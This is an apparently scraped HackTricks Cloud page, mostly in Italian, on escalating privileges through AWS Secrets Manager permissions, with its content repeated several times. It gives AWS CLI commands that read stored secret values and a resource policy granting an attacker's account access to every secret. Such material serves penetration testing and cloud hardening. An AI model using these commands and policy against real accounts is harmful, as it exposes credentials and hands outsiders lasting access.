AWS - Secrets Manager Privesc

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Secrets Manager

Per ulteriori informazioni su Secrets Manager, controlla:

AWS - Secrets Manager Enum

`secretsmanager:GetSecretValue`

Un attaccante con questo permesso può ottenere il valore salvato all'interno di un segreto in AWS Secretsmanager.

aws secretsmanager get-secret-value --secret-id <secret_name> # Get value

Impatto Potenziale: Accesso a dati altamente sensibili all'interno del servizio AWS secrets manager.

`secretsmanager:GetResourcePolicy`, `secretsmanager:PutResourcePolicy`, (`secretsmanager:ListSecrets`)

Con i permessi precedenti è possibile dare accesso ad altri principali/account (anche esterni) per accedere al segreto. Si noti che per leggere segreti crittografati con una chiave KMS, l'utente deve anche avere accesso sulla chiave KMS (maggiori informazioni nella pagina KMS Enum).

aws secretsmanager list-secrets
aws secretsmanager get-resource-policy --secret-id <secret_name>
aws secretsmanager put-resource-policy --secret-id <secret_name> --resource-policy file:///tmp/policy.json

policy.json:

{
"Version" : "2012-10-17",
"Statement" : [ {
"Effect" : "Allow",
"Principal" : {
"AWS" : "arn:aws:iam::<attackers_account>:root"
},
"Action" : "secretsmanager:GetSecretValue",
"Resource" : "*"
} ]
}

Supporta HackTricks

Controlla i piani di abbonamento!
Unisciti al 💬 gruppo Discord o al gruppo telegram o seguici su Twitter 🐦 @hacktricks_live.
Condividi trucchi di hacking inviando PR ai HackTricks e HackTricks Cloud repos su github.

PreviousAWS - Sagemaker Privesc NextAWS - SSM Privesc

Last updated 3 days ago

Secrets Manager

Per ulteriori informazioni su Secrets Manager, controlla:

AWS - Secrets Manager Enum

secretsmanager:GetSecretValue

Un attaccante con questo permesso può ottenere il valore salvato all'interno di un segreto in AWS Secretsmanager.

aws secretsmanager get-secret-value --secret-id <secret_name> # Get value

Impatto Potenziale: Accesso a dati altamente sensibili all'interno del servizio AWS secrets manager.

secretsmanager:GetResourcePolicy, secretsmanager:PutResourcePolicy, (secretsmanager:ListSecrets)

aws secretsmanager list-secrets
aws secretsmanager get-resource-policy --secret-id <secret_name>
aws secretsmanager put-resource-policy --secret-id <secret_name> --resource-policy file:///tmp/policy.json

policy.json:

{
"Version" : "2012-10-17",
"Statement" : [ {
"Effect" : "Allow",
"Principal" : {
"AWS" : "arn:aws:iam::<attackers_account>:root"
},
"Action" : "secretsmanager:GetSecretValue",
"Resource" : "*"
} ]
}

Secrets Manager

secretsmanager:GetSecretValue

secretsmanager:GetResourcePolicy, secretsmanager:PutResourcePolicy, (secretsmanager:ListSecrets)

Secrets Manager

secretsmanager:GetSecretValue

secretsmanager:GetResourcePolicy, secretsmanager:PutResourcePolicy, (secretsmanager:ListSecrets)

`secretsmanager:GetSecretValue`

`secretsmanager:GetResourcePolicy`, `secretsmanager:PutResourcePolicy`, (`secretsmanager:ListSecrets`)

`secretsmanager:GetSecretValue`

`secretsmanager:GetResourcePolicy`, `secretsmanager:PutResourcePolicy`, (`secretsmanager:ListSecrets`)